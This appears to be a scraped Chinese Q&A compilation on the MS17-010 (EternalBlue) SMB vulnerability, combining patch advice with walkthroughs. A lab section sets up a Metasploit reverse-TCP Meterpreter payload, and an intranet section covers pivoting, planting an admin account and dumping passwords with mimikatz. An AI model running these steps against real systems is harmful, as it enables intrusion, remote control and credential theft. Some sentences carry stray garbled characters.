ms17010各版本

『壹』 ms17010漏洞利用windows什麼服務

SMB服務。
在微軟的MS17-010中被修復是在Windows的SMB服務處理SMBv1請求時發生的漏洞，這個漏洞導致攻擊者在目標系統上可以執行任意代碼。
Windows操作系統是其中的佼佼者，也是美國微軟公司推出的一款操作系統。該系統從1985年誕生到現在，經過多年的發展完善，相對比較成熟穩定，是當前個人計算機的主流操作系統。

『貳』 如何安裝windowsms17010補丁

這個呢 ，我沒有什麼簡單的命令，我的方法是藉助360和電腦管家，在漏洞修復中，可以查本機安裝漏洞的詳細信息。
個人感覺 一目瞭然

『叄』 ms17010漏洞的簡單利用

（第一次在發表文章，沒啥經驗，分享一些學習經驗。大佬們多多包涵，也希望大家能夠指出我的錯誤。）

靶機：windows7 x64  IP：192.168.1.5

攻擊機：Kali Rolling (2019.3) x64 IP：192.168.1.3

兩台主機在同一網段內；win7關閉防火牆並且開啟445埠。

1、使用ipconfig/ifconfig分別查看win7和kali的ip。

2、打開msf工具

每次開啟都會有不同的界面

3、使用search命令搜索ms17_010

4、選擇模塊和設置條件

使用use來選擇第三個模塊，可以直接 use 2，也可以打全

然後用set來設置靶機IP set rhost 192.168.1.5

設置本機IP set lhost 192.168.1.3

設置監聽埠 set lport 8888 不設置則默認4444埠

設置payload set payload windows/x64/meterpreter/reverse_tcp

還有另外一個payload能用於本實驗，具體可以 show payloads 查看

最後，可以使用show options檢查所有信息

5、開始滲透 run

稍等片刻 看到win則成功創建會話

6、成功之後，可以開啟Windows7的攝像頭，截圖等等

具體可以用help查看

1、關閉445埠

2、打開防火牆，安裝安全軟體

3、安裝對應補丁，這里就不放鏈接了

關閉445埠的方法：

1）打開控制面板----Windows防火牆----高級設置

2）點擊新建規則，設置埠號的規則並且命名（如圖）

msf工具雖然強大，但只能用於已知的並且已提交模塊的漏洞。要理解漏洞原理，理解如何使用漏洞，甚至自己挖洞才能做到真正的去攻擊。而不是簡單的使用工具use和set。

『肆』 如何查看ms17010 是否已安裝補丁

1、在電腦上按「windows鍵」+R快速打開「運行」，輸入「winver」。

『伍』 MS17010補丁不知道選哪個

然後點擊控制面板-程序與安全-卸載程序，在右上角的搜索框內輸入那個KB代碼之後上微軟官網搜索回MS17-010漏洞的KB代碼，如果有答的話會顯示出來，沒有的話請去安裝，然後點擊右邊的「查看已安裝的更新」，不同的Windows系統對應的KB代碼是不同的

『陸』 內網滲透之ms17-010

在內網滲透時，通常掛上代理後。在內網首先會打啵ms17-010。在實戰中，使用msf的ms17-010模塊，數次沒有反彈成功。基於此，到底如何成功利用ms17-010

在msf成功接收session之後，添加路由

然後使用ms17-010相關的模塊進行探測是否存在該漏洞。

嘗試利用

LHOST配置為公網IP

可以看到success。漏洞是可以利用的，但始終沒有session。不知道什麼原因。
參考資料： 利用公網Msf+MS17010跨網段攻擊內網
筆者在本地搭建環境，也是同樣的結果。嘗試更改payload為

bind_tcp攻擊者去連接，容易被防火牆和殺毒發現
可以成功生成session，但並不穩定，且在run的過程中非常容易導致本來的session died

在實際使用msf的ms17_010_eternalblue模塊時，筆者觀察到有幾個弊端。
1.session 很容易died
2.ms17_010_eternalblue模塊利用起來非常耗時
3.無法利用成功
有大佬推薦使用原始的fb.py。但配置起來感覺麻煩一些。
所以。筆者從i春秋上找到一個輕便的方程式漏洞利用工具。
參考資料： 萌新初試MS17-010方程式漏洞
工具使用起來很簡單。只需要msfvenom生成一個x64或x86的dll文件，替換該工具下的x64.dll或x86.dll 。再依次點擊Eternalblue、Doublepulsar 的Attack即可。在Attack的時候，調用x64.dll動態鏈接庫，反彈到公網IP。原理和fb.py一樣。

筆者通過ew代理進內網後，在跳板機上上傳了方程式漏洞利用工具、網安永恆之藍檢測工具。兩者結合，威力巨大。成功利用ms17-010

對於windows server 2008 ，msfvenom生成x64.dll文件

msf配置

將該x64.dll替換到方程式利用工具下面。
只需要更換目標的IP，就可以獲取session。

對於windows server 2003 ，msfvenom生成x86.dll文件

msf配置

進一步利用的一些命令

實際測試發現這種session非常穩定。不會輕易go die

實際測試server 2003的ms17-010時，有時候多次執行後msf就接收不到session，而且ms17-010利用時，脆弱的server 2003非常容易藍屏。
所以筆者選擇一種穩定可靠一些的辦法。
先通過ms17_010_commend模塊執行系統命令添加用戶至管理員。再指定SMBPass和SMBUser來建立windows可訪問命名管道[accessible named pipe]

參考資料 Metasploit 「永恆之藍」兩種模塊的利弊

system的許可權可以直接激活guest用戶添加管理員組。

注意：使用ms17_010_psexec需要指定管理員的用戶名、密碼，否則沒有session

同樣的操作，載入mimikatz，讀取管理員密碼。

『柒』 怎樣安裝MSU微軟ms17010漏洞最新補丁

建議騰訊電復腦管家修復制，系統漏洞經常被黑客利用傳播惡意程序（如網頁掛馬），必須及時修復系統漏洞才能有效防止計算機在上網時被黑客入侵，不過如果安裝了安全軟體，並且漏洞介紹看起來不是那麼嚴重的話，可以選擇不修復。
Windows系統漏洞是指操作系統在開發過程中存在的技術缺陷，這些缺陷可能導致其他用戶在未被授權的情況下非法訪問或攻擊計算機系統。因此，系統開發商一般每月都會發布最新的補丁用以修復新發現的漏洞。目前，騰訊電腦管家支持修復Windows操作系統漏洞和部分第三方軟體漏洞。

『捌』 MS17010補丁不知道選哪個

可以來點擊開始菜單，控制面自板，卸載程序，顯示更新補丁。
不同版本可以搜索補丁

winxp特別補丁KB4012598
win2003特別補丁KB4012598
win2008R2補丁 KB4012212、KB4012215
win7補丁 KB4012212、KB4012215